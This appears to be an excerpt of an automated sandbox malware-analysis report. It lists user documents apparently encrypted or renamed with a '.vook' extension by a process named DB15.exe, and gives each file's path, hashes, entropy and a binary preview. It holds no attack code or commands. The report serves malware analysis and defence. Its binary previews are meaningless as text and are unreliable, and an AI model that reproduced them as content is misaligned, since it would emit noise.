                                                                                                                                                                                                                                      Preview:EOWRV..dC4.t=...\....kl>.e..(.S.(T?...h.`.. ....{....BW....M..1.C..X.=.G..v sCh...{g.C..j.w<..C.;.E8.XX<)p.XPZ.L.h....^.E....k.1...Zk^.......^,..^..Kj...-R.oz..d...?...w.v........Pa.L4...dOo7...3d..F+./..jm...s.~...!X....9.}....{..%.. .+.#.]l~...Y.\....>_.^.k.6...;*>t=.Fx...F...E...iE+...w...G.e[..FcD..|V...Hv0..m.+:....N................r.4....`%.4b........h:..A.....}.9_. Z.y2..0nV...@}.5.. :w.;!.."....n.H\.Wi.2.....EeOs.K(...c.U...3.M.).....CP..]........C.,...@V..0E~".q{......4N...Amjb......*z..R.l..H.^z1....."...6s...(...F.....C...F.\...]UH...x....mI..=F6-.^&Rw#.w.^..x..l\..!..Z....\...W"$.e.@0......4..}.v..S...Dh../z..cF.P.8.[..(.......braI...gc.^Vb=..'...Q.bN.j.4.T..G..TF.sM.b..F'.{M.d.....X.7..k..........%...n...'..k.5..m...W..o..:5h..f..c.U./...y....pN].r&.,-..4...F..a.H.2K..m?..J..=...b..........S..4X]......m.......2Wi.{..`(.........[W..?I.{..]....H!2.D..ID3\Z..P.9..e.........`.G...].o..............Y....h.t..i>..=p.....j..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\GRXZDKKVDB.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.857333121753528
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:nU2r6w5Y2uDyuevQgcYwTxStawMiezsxxCMvYhsrWyo6CIc8Pbr38irEemgcTGiq:nUk6Z2CAQfzSoBMNWyo6jPPbDpcTjiD
                                                                                                                                                                                                                                      MD5:CC03F9A442D1AD3C6ACD84D02AECB870
                                                                                                                                                                                                                                      SHA1:053C1A9F0DEF81F7FD08777068AD75D3C0887A52
                                                                                                                                                                                                                                      SHA-256:3C4325528583494E4F7B5B4822B8B5649B9B9D8522C63F368F7EA4F44660C83C
                                                                                                                                                                                                                                      SHA-512:7D59975C819D0EF0ED381A3D32F9DFE259D83C983BB2AFCE3EE0EEC561EE27E62306CD79C6D9BD6DAEC89D5BC7FFD8E867BA75437CCFBF444DCF9F1E4F32DAB5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZD.c.M.............h*7...?).FW..b..E.r[..._:..Hm..yR2.6..H..uK......:.....S...RY<z..l.#...l?....V..}.Y.........z..^.?.PI{..M.....I.M..`.y......s..ZXO<..i...x3..!. K@Y.0.N.[..s.V..Wv..:.,..#c..Gr....+.=..=K.o.....[.T=..(.3....1.Q..H.....-..~.....G2d....{z..7........m.k..B...M!Wb.Sb....TY.Cc.....GG..........1+.oB{..<@..C......r[.......P.b.}R...b.*..62.].z....v...|Z.....O1.h.m..-.yf..%.....#..meJ.``b..!...w+0...T.....8.3..xv...u.."..v.df..4}AV.J.(...3.2............[`..."..:.6|..l%..:..cNZ.0Fn0v.#A6*FX....).ut.:...P.g'..!.......I..`:....[&..-o.....{...C.l.p.)..i.f@.b..=[...Au.!.].>..\.q.dq.@..S.oQ..sK.;#J..E&.....l...=....=R..O..,K6...o..wJ......N.P..?..[...3.7U..bF..+..zC.@.t".......y2M:`2g.Dr.V...0.v. .01'.gs...e....v.../..C......`..0.....].i.DEY.~...D=.(.7K.t....iq..~.N..y..d..j?..yCF..k.k.5%.A.6M..%..].......n#..IT||..tz._.v/,.'4..C)J..[. m.,d..'.A5G..]..3?.a*....J..;..%=.".J..q.4.....z.JN.B.v8r....p..N5......?..i...%.9..P..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\GRXZDKKVDB.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.857333121753528
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:nU2r6w5Y2uDyuevQgcYwTxStawMiezsxxCMvYhsrWyo6CIc8Pbr38irEemgcTGiq:nUk6Z2CAQfzSoBMNWyo6jPPbDpcTjiD
                                                                                                                                                                                                                                      MD5:CC03F9A442D1AD3C6ACD84D02AECB870
                                                                                                                                                                                                                                      SHA1:053C1A9F0DEF81F7FD08777068AD75D3C0887A52
                                                                                                                                                                                                                                      SHA-256:3C4325528583494E4F7B5B4822B8B5649B9B9D8522C63F368F7EA4F44660C83C
                                                                                                                                                                                                                                      SHA-512:7D59975C819D0EF0ED381A3D32F9DFE259D83C983BB2AFCE3EE0EEC561EE27E62306CD79C6D9BD6DAEC89D5BC7FFD8E867BA75437CCFBF444DCF9F1E4F32DAB5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZD.c.M.............h*7...?).FW..b..E.r[..._:..Hm..yR2.6..H..uK......:.....S...RY<z..l.#...l?....V..}.Y.........z..^.?.PI{..M.....I.M..`.y......s..ZXO<..i...x3..!. K@Y.0.N.[..s.V..Wv..:.,..#c..Gr....+.=..=K.o.....[.T=..(.3....1.Q..H.....-..~.....G2d....{z..7........m.k..B...M!Wb.Sb....TY.Cc.....GG..........1+.oB{..<@..C......r[.......P.b.}R...b.*..62.].z....v...|Z.....O1.h.m..-.yf..%.....#..meJ.``b..!...w+0...T.....8.3..xv...u.."..v.df..4}AV.J.(...3.2............[`..."..:.6|..l%..:..cNZ.0Fn0v.#A6*FX....).ut.:...P.g'..!.......I..`:....[&..-o.....{...C.l.p.)..i.f@.b..=[...Au.!.].>..\.q.dq.@..S.oQ..sK.;#J..E&.....l...=....=R..O..,K6...o..wJ......N.P..?..[...3.7U..bF..+..zC.@.t".......y2M:`2g.Dr.V...0.v. .01'.gs...e....v.../..C......`..0.....].i.DEY.~...D=.(.7K.t....iq..~.N..y..d..j?..yCF..k.k.5%.A.6M..%..].......n#..IT||..tz._.v/,.'4..C)J..[. m.,d..'.A5G..]..3?.a*....J..;..%=.".J..q.4.....z.JN.B.v8r....p..N5......?..i...%.9..P..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\PWCCAWLGRE.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.82909290735536
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:vvB5Q8wSs72IN4Of9NsNQEeKSMwZhpPKIHagAbAnE9mkeRzmZ76SBaQZiTkbD:vvB1wSsaIN7MQf6wJrHEkeqk/wQ4iD
                                                                                                                                                                                                                                      MD5:C1577CB78C80112164D423CBA552E915
                                                                                                                                                                                                                                      SHA1:BCEFD7621B639E57FC5A71F12A33DF4C7950954B
                                                                                                                                                                                                                                      SHA-256:054E4D7E63D9B2CA05DA6B501D752FB1F8CA233C1C5E9F3702BC6D0EA2FF0A80
                                                                                                                                                                                                                                      SHA-512:F6CA74870FB72D7CBB684262CB03F67733CD116C4B48C370DAC8DCBB867B068A5954B784EA9C5284654AAFD8D78209395B9463F5539F9847F527D9415BE2B1E9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:PWCCA+..\..T.kFp.&#.U.V..-,.........A]........*I...Yv!....`y.....=N.Q...\*...^D.....Ab...L@.<Qbq....p!...md.z..p.d!.1.[..j.....?g..g3.l....X_.....S....L{.......Rj...9 ...=...K:8.,.S......_.B..Q_..;...34.x.&....p...%....n..\.>D..C.H.._..i...i71...ptGgUie.m.u..=.....gs.....#..P.[..A.bMo...R..'......p.k`AT\...8..fa8TI.%....$...B.<~8.I.....N@#.(._'.I..N..X..a.......WC......,..\bO{(.w...{..y.....4..I....V,....k..<....Fk.........Oz9.S.....x"....W..c.s..e........G.s..R]i.0......P.8.6..u...H.X.1....h...T.g vZ....[..n..5........hd.........().......S..<..'.{:h.8....:6.+g.c..l....).d.k[0..Bu.t...3_....].D.`>e..y...A*.aS..p.....S..A..{.._.}^...A..E..ld.V..........P.*.!..y,plh..Y..B.g..*o...C../....&..../..P-.K.L!..*OS...>.K..\.;&.{@FX.]L... ..8..H.*.q ....;.e..1.......e.m.#.B.\.....>.5!..+.....{.b.F..f......Vl...$N..g..s.....B`O.@r.l..X5..G.O'd..\.....M..P.....i..1.0.c..1.....)....L.h.0....(<....+..y.....s...*./YZ.FO4...E.{....(.k..e...........VA

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\PWCCAWLGRE.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.82909290735536
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:vvB5Q8wSs72IN4Of9NsNQEeKSMwZhpPKIHagAbAnE9mkeRzmZ76SBaQZiTkbD:vvB1wSsaIN7MQf6wJrHEkeqk/wQ4iD
                                                                                                                                                                                                                                      MD5:C1577CB78C80112164D423CBA552E915
                                                                                                                                                                                                                                      SHA1:BCEFD7621B639E57FC5A71F12A33DF4C7950954B
                                                                                                                                                                                                                                      SHA-256:054E4D7E63D9B2CA05DA6B501D752FB1F8CA233C1C5E9F3702BC6D0EA2FF0A80
                                                                                                                                                                                                                                      SHA-512:F6CA74870FB72D7CBB684262CB03F67733CD116C4B48C370DAC8DCBB867B068A5954B784EA9C5284654AAFD8D78209395B9463F5539F9847F527D9415BE2B1E9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA+..\..T.kFp.&#.U.V..-,.........A]........*I...Yv!....`y.....=N.Q...\*...^D.....Ab...L@.<Qbq....p!...md.z..p.d!.1.[..j.....?g..g3.l....X_.....S....L{.......Rj...9 ...=...K:8.,.S......_.B..Q_..;...34.x.&....p...%....n..\.>D..C.H.._..i...i71...ptGgUie.m.u..=.....gs.....#..P.[..A.bMo...R..'......p.k`AT\...8..fa8TI.%....$...B.<~8.I.....N@#.(._'.I..N..X..a.......WC......,..\bO{(.w...{..y.....4..I....V,....k..<....Fk.........Oz9.S.....x"....W..c.s..e........G.s..R]i.0......P.8.6..u...H.X.1....h...T.g vZ....[..n..5........hd.........().......S..<..'.{:h.8....:6.+g.c..l....).d.k[0..Bu.t...3_....].D.`>e..y...A*.aS..p.....S..A..{.._.}^...A..E..ld.V..........P.*.!..y,plh..Y..B.g..*o...C../....&..../..P-.K.L!..*OS...>.K..\.;&.{@FX.]L... ..8..H.*.q ....;.e..1.......e.m.#.B.\.....>.5!..+.....{.b.F..f......Vl...$N..g..s.....B`O.@r.l..X5..G.O'd..\.....M..P.....i..1.0.c..1.....)....L.h.0....(<....+..y.....s...*./YZ.FO4...E.{....(.k..e...........VA

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\SFPUSAFIOL.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.84611297524749
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1ZChiUCqGOcUQqyE87O+/u65ulNxP9E6NQvXMgzpfdqiTkbD:1YhSqGBUxyN9/uWsNx7QEgHiD
                                                                                                                                                                                                                                      MD5:83D89B17D7908AB822A8F1CA5C50A9EE
                                                                                                                                                                                                                                      SHA1:D8624EB37FF8376001F3B2599AF0259CEAEE3A3E
                                                                                                                                                                                                                                      SHA-256:FC709D4C42DE039AE26E52734093D9FCE2A2C808E2F8B7E1F82450A00435E627
                                                                                                                                                                                                                                      SHA-512:016655D52CF3D2C6ECBE0F86B19678BC7757DCF127D9C7578A6A47752D34E266D59EC5681A56B0BF4A08B9F88A60B176E87526C6BEFAE86A9CF103C2A4CC2B6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.u.;.5s..Y...G59...\._...........w).aaH.p.t.U|.O-X.U.,..[...<..Ly..lC_..w\..>...O...fw.).B.J N.$...0.r..'.TZ...`.&V.kG<}.....Z._.......I..b._.:&:z|..m..s.w..>.T.P.JPv}..M......}.Nl......hI2.,...@@)*.(.......a..0\>..5&|.J...t}.....>..7....(....6J.(......S...g2.A.......q.WF..g....&.-.-.w2V...(...H...0f>s.Z.W ...w.......5..M.....}..Z....nP....92../f..Ms.C...$O...{.pk....3..YD-.XB.0..h.....f]|...3...WUz.W=..Lj..+8@.E...p`}f....PCq%..Nh......>y...)....}W.$....RX(p..I/.tu' p*C.{.i.]H..]..."Y..(......".z.$..(....MA......k.v.[.. :.P.-...Y.........P= 6.f..|.....&.C%z.....?.}.NZ.rk...8...],..#..........o wn.._..,j.s.b.[...1t..?.0.....N.u.(.@...!&.*..&...'...............v.S9YG>.o.u...-A.....|...A!.4...Go.e"...q.V....e.....0..w...|...|."6O.....H_..p.N.....%.I..%R.l.~....>..x.<..p..TV.,...~Y.'R.[....>.=.P.Z.LBs.L....`U....9..Kd\...*t.....M..oZ."...t.....R....i....y..c8.....H^..'*!.=8<.a.B...OGCc..........F..:.....]:..........M.Q.,%

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\SFPUSAFIOL.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.84611297524749
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1ZChiUCqGOcUQqyE87O+/u65ulNxP9E6NQvXMgzpfdqiTkbD:1YhSqGBUxyN9/uWsNx7QEgHiD
                                                                                                                                                                                                                                      MD5:83D89B17D7908AB822A8F1CA5C50A9EE
                                                                                                                                                                                                                                      SHA1:D8624EB37FF8376001F3B2599AF0259CEAEE3A3E
                                                                                                                                                                                                                                      SHA-256:FC709D4C42DE039AE26E52734093D9FCE2A2C808E2F8B7E1F82450A00435E627
                                                                                                                                                                                                                                      SHA-512:016655D52CF3D2C6ECBE0F86B19678BC7757DCF127D9C7578A6A47752D34E266D59EC5681A56B0BF4A08B9F88A60B176E87526C6BEFAE86A9CF103C2A4CC2B6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.u.;.5s..Y...G59...\._...........w).aaH.p.t.U|.O-X.U.,..[...<..Ly..lC_..w\..>...O...fw.).B.J N.$...0.r..'.TZ...`.&V.kG<}.....Z._.......I..b._.:&:z|..m..s.w..>.T.P.JPv}..M......}.Nl......hI2.,...@@)*.(.......a..0\>..5&|.J...t}.....>..7....(....6J.(......S...g2.A.......q.WF..g....&.-.-.w2V...(...H...0f>s.Z.W ...w.......5..M.....}..Z....nP....92../f..Ms.C...$O...{.pk....3..YD-.XB.0..h.....f]|...3...WUz.W=..Lj..+8@.E...p`}f....PCq%..Nh......>y...)....}W.$....RX(p..I/.tu' p*C.{.i.]H..]..."Y..(......".z.$..(....MA......k.v.[.. :.P.-...Y.........P= 6.f..|.....&.C%z.....?.}.NZ.rk...8...],..#..........o wn.._..,j.s.b.[...1t..?.0.....N.u.(.@...!&.*..&...'...............v.S9YG>.o.u...-A.....|...A!.4...Go.e"...q.V....e.....0..w...|...|."6O.....H_..p.N.....%.I..%R.l.~....>..x.<..p..TV.,...~Y.'R.[....>.=.P.Z.LBs.L....`U....9..Kd\...*t.....M..oZ."...t.....R....i....y..c8.....H^..'*!.=8<.a.B...OGCc..........F..:.....]:..........M.Q.,%

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\SQSJKEBWDT.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843283391299537
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:sW1dQZ3+0JprfW94dE43sar81F8a1Cotfq0xMkhuTBBL8OvPz1G9BN0BA2iTkbD:314+0Jxf64dqariF8a1xtfqSEdR8OchU
                                                                                                                                                                                                                                      MD5:233D5CA7FE83426249C767FF7BBC5231
                                                                                                                                                                                                                                      SHA1:3F5661263B197EE4A98B47103E6AF822B69CCD7C
                                                                                                                                                                                                                                      SHA-256:D0339CC362D83AF049F708F472FF7D15B09970A57979C988A24176B8EBE97180
                                                                                                                                                                                                                                      SHA-512:AA3C316D037BDCD40DA3B28C24A0107B97857B50EE6089F1288B832767C8CB01745F5830CF486A19A8BD72B276516B7C16E3F3172630E4CCA02E491A58C27C05
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK.....+l@.$.....A..{B.X......0.}.[.2.2......u$.q..z.Y,T"!...(5.7..>=....R{+.|x`..Y..(GA&$l....P../.^]-'..7...k..{..z.'......$-.v....v.Q<.x......->.oJ}.z....aT)y..j...".-.Ky..a6{.x.9xkph"..^...1.......}.3.K..A..j...Q.......Qef.n..c2..j.......97o.9O...P...K......c..F..9...Z..?..3mZ.i.....:.+.[...Z(....y..(....E.H....s.O.....-..Y..f.-A....`..8.NU...JP....".h..Yk...x.7B.....X..d ...UxD{.,;..^j....e.T[..y.t.S..,.;.........i...?J.,.....bfT. ..".6d...I.q..Y@.;4Q.....&./6^ ..7.J....<l......4)....Au....I.........d*fp...*.c.Tv.r.F..._.....C..-A..Z..iu...y....r.jV.3.S.H..I.[..j.:.Z@!M..T.f^.......v.b..^...Q.......!.j........{...\.r\.....9....1..<..l>....|.\g.|q..L..;.|....>O.b...y.c.~...c@...2...U..afg&..Db......@L..g.C...~...zw......e...6......nT...r[.B#.P...S.;.k.v.|;6.....5.....t.>;[2._].....l.....O.dz.s..0.......-i.$j.{....4.us*;n...3.z..y8{>Ht......e.RVO.5.G..%-wc...e..Z0.6..2$..~CU.=.o..=..2[ir....joY..J.Cb..s.;..k......s.p?.K:..|.......9.`..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\SQSJKEBWDT.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843283391299537
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:sW1dQZ3+0JprfW94dE43sar81F8a1Cotfq0xMkhuTBBL8OvPz1G9BN0BA2iTkbD:314+0Jxf64dqariF8a1xtfqSEdR8OchU
                                                                                                                                                                                                                                      MD5:233D5CA7FE83426249C767FF7BBC5231
                                                                                                                                                                                                                                      SHA1:3F5661263B197EE4A98B47103E6AF822B69CCD7C
                                                                                                                                                                                                                                      SHA-256:D0339CC362D83AF049F708F472FF7D15B09970A57979C988A24176B8EBE97180
                                                                                                                                                                                                                                      SHA-512:AA3C316D037BDCD40DA3B28C24A0107B97857B50EE6089F1288B832767C8CB01745F5830CF486A19A8BD72B276516B7C16E3F3172630E4CCA02E491A58C27C05
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK.....+l@.$.....A..{B.X......0.}.[.2.2......u$.q..z.Y,T"!...(5.7..>=....R{+.|x`..Y..(GA&$l....P../.^]-'..7...k..{..z.'......$-.v....v.Q<.x......->.oJ}.z....aT)y..j...".-.Ky..a6{.x.9xkph"..^...1.......}.3.K..A..j...Q.......Qef.n..c2..j.......97o.9O...P...K......c..F..9...Z..?..3mZ.i.....:.+.[...Z(....y..(....E.H....s.O.....-..Y..f.-A....`..8.NU...JP....".h..Yk...x.7B.....X..d ...UxD{.,;..^j....e.T[..y.t.S..,.;.........i...?J.,.....bfT. ..".6d...I.q..Y@.;4Q.....&./6^ ..7.J....<l......4)....Au....I.........d*fp...*.c.Tv.r.F..._.....C..-A..Z..iu...y....r.jV.3.S.H..I.[..j.:.Z@!M..T.f^.......v.b..^...Q.......!.j........{...\.r\.....9....1..<..l>....|.\g.|q..L..;.|....>O.b...y.c.~...c@...2...U..afg&..Db......@L..g.C...~...zw......e...6......nT...r[.B#.P...S.;.k.v.|;6.....5.....t.>;[2._].....l.....O.dz.s..0.......-i.$j.{....4.us*;n...3.z..y8{>Ht......e.RVO.5.G..%-wc...e..Z0.6..2$..~CU.=.o..=..2[ir....joY..J.Cb..s.;..k......s.p?.K:..|.......9.`..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.861697328581578
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:LXeW/vgHmWiuv8CkeCLHebWe4mAthqMDroZ/ojPPrkn3nebODnWfV8gleriTkbD:LXeWngGWPv8HdDea9hq68qjPPrEeGYO1
                                                                                                                                                                                                                                      MD5:5FF9E4572B06B4739480EA1A7D5DBB74
                                                                                                                                                                                                                                      SHA1:694FA1C5B277CB9923B78DB69B5DDF8447C31752
                                                                                                                                                                                                                                      SHA-256:55F2AB1A7CF4306C52BE889905C3ED5CAE76C3F4AD0F74B3D231685E6DAF5B25
                                                                                                                                                                                                                                      SHA-512:F456927AE1B6892872B2D02DCEB99F4BD482390844888C4F43F1A13C9D23145D0AEC0C9047F5C0A885EEA31EB66EDD9A32493CCC471EABAD40FE76D0538BB4F5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.L.).N....0....Ai./>T...u.....*..C. .U....B.. W...!<.h.....ZEI...7....V..q.0.D.l.K.h..-..#zzS......$..6.s...$.PH..w..O(....Y..0t|h.....Owl..x..Xh ......^r.H. a.&..i...h.>.`.i#-^.O<eu.=....h'.'.....<....c...D6M.h*L...G....Y..p..E9m_..;-}:.{wS....t/.a..s.".}.eZ..#H7<.d|v.<..F.,...(J2.Y.?V&...F.0...P.....K...L? i..f{.M.w9.#xj......j..S;[....J3.!..J. .....l../..._(.?=..tt....y..E@{......tZ....R.J7.S...*|M.v}.'b..kt..._.. .M..p.?>.......I.....^...S.......e/.kxX......._.!.k.....,....h.\e.i.<u....D.O..Jp.i......r.r...M.~W..NrS........e{.,.3...0....0..4G#T>.o...X"...'....aF..U..d6..V..g!.e..S...;r.)H.....E..I.,......_.'.........k..b....`...rrCP..$.i%.L...l....Y....1;v[..,.h..iIu49.5...fy.tF!.-.....:3+.V.r...$..T...k[<......1.M......C.......@A..Ig.o.z..%.,x.1Om..+a....s.t.$..Z.....I.....V4*....)...\..9.....S.0j.c.s}&...V$...R........Md|._+5Ds.m5.-:....?M0f....Z...&.......h.L..^...,......&$...qg..@... ...n\.Kon...1y..%=.q$h.....%s...q.M..n.%.....X..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.861697328581578
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:LXeW/vgHmWiuv8CkeCLHebWe4mAthqMDroZ/ojPPrkn3nebODnWfV8gleriTkbD:LXeWngGWPv8HdDea9hq68qjPPrEeGYO1
                                                                                                                                                                                                                                      MD5:5FF9E4572B06B4739480EA1A7D5DBB74
                                                                                                                                                                                                                                      SHA1:694FA1C5B277CB9923B78DB69B5DDF8447C31752
                                                                                                                                                                                                                                      SHA-256:55F2AB1A7CF4306C52BE889905C3ED5CAE76C3F4AD0F74B3D231685E6DAF5B25
                                                                                                                                                                                                                                      SHA-512:F456927AE1B6892872B2D02DCEB99F4BD482390844888C4F43F1A13C9D23145D0AEC0C9047F5C0A885EEA31EB66EDD9A32493CCC471EABAD40FE76D0538BB4F5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.L.).N....0....Ai./>T...u.....*..C. .U....B.. W...!<.h.....ZEI...7....V..q.0.D.l.K.h..-..#zzS......$..6.s...$.PH..w..O(....Y..0t|h.....Owl..x..Xh ......^r.H. a.&..i...h.>.`.i#-^.O<eu.=....h'.'.....<....c...D6M.h*L...G....Y..p..E9m_..;-}:.{wS....t/.a..s.".}.eZ..#H7<.d|v.<..F.,...(J2.Y.?V&...F.0...P.....K...L? i..f{.M.w9.#xj......j..S;[....J3.!..J. .....l../..._(.?=..tt....y..E@{......tZ....R.J7.S...*|M.v}.'b..kt..._.. .M..p.?>.......I.....^...S.......e/.kxX......._.!.k.....,....h.\e.i.<u....D.O..Jp.i......r.r...M.~W..NrS........e{.,.3...0....0..4G#T>.o...X"...'....aF..U..d6..V..g!.e..S...;r.)H.....E..I.,......_.'.........k..b....`...rrCP..$.i%.L...l....Y....1;v[..,.h..iIu49.5...fy.tF!.-.....:3+.V.r...$..T...k[<......1.M......C.......@A..Ig.o.z..%.,x.1Om..+a....s.t.$..Z.....I.....V4*....)...\..9.....S.0j.c.s}&...V$...R........Md|._+5Ds.m5.-:....?M0f....Z...&.......h.L..^...,......&$...qg..@... ...n\.Kon...1y..%=.q$h.....%s...q.M..n.%.....X..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836439785856781
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:nt5KC/6SI+4Jqw3RhV84hLqdxVToH+cIGKWv9J7pA/iwt065XxbiTkbD:t5tNLgV8bHVT0+TaS/oUciD
                                                                                                                                                                                                                                      MD5:B172199C16625F4E978EED7675255E44
                                                                                                                                                                                                                                      SHA1:2A59CB92118B17EB8C35716BA13940CECB40AF6D
                                                                                                                                                                                                                                      SHA-256:FF941B677AF62DB29B14764A43E319573A176D49FE2DE54237F3F7B7C2218E4E
                                                                                                                                                                                                                                      SHA-512:856518DFC7F2E702F6BFDCF130BCFB6F3488A4B611A6A19C02FD477BA7E1CE72F782CD4228859E0C4F147E5B39D3874AAD5DCB3B5140CBD212CCAB0BAB291964
                                                                                                                                                                                                                                      Malicious:false
